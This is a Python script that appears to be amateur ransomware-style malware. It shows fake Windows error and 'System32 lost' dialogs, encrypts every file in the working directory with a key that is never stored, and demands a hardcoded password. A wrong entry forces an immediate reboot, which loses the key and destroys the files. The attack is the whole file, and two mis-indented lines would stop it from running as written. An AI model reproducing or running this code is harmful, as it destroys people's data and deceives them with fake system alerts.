import time
from subprocess import call
call(["python", "YourAcutie.TXT"])

import ctypes
ctypes.windll.user32.MessageBoxW(3, "Run Program", "YourAcutie.TXT asks", 32)
time.sleep(10)
ctypes.windll.user32.MessageBoxW(0, "YourAcutie.TXT has unexpectedly crashed", "Windows Alert", 16)

import os
from cryptography.fernet import Fernet

# Searching for file to encrypt exept from the ransomware file
files = []

for file in os.listdir():
	if file == "FailSafe.py":
		continue
	if os.path.isfile(file):
		files.append(file)
print(files)

# Creating a encrpytionkey that will be used to lock the found files
secretkey = Fernet.generate_key()

# Going through the files list and encrpying everything
for file in files:
	with open(file, "rb") as thefile:
		contents = thefile.read()
	contents_encrypted = Fernet(secretkey).encrypt(contents)
	with open(file, "wb") as thefile:
		thefile.write(contents_encrypted)
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print("ERROR")
print("File [System32] Not found")
  ctypes.windll.user32.MessageBoxW(0, "[System32] Folder Lost", "Computer", 16)

time.sleep(5)
# Password to run the script. DO NOT USE THIS AS THE DECRIPT PASSWORD
password = "pASS?0wRd"
call(["python", "FailSafe.py"])


userInput = input("Files Lost\n")
time.sleep(2)
ctypes.windll.user32.MessageBoxW(0, "Files Lost", "Computer", 16)

# Checking the password that the user put in, if its right the user will get a message saying the files are decrypted 
# and if its wrong a message saying that the password is wrong
if userInput == password:
	for file in files:
		with open(file, "rb") as thefile:
			contents = thefile.read()
		contents_decrypted = Fernet(secretkey).decrypt(contents)
		with open(file, "wb") as thefile:
			thefile.write(contents_decrypted)
	print("Restart your PC")

else:
	print("Restarting your PC")
	os.system("shutdown /r /t 1")	
  ctypes.windll.user32.MessageBoxW(0, "Restarting your PC", "Computer", 16)
os.system("shutdown /r /t 1")
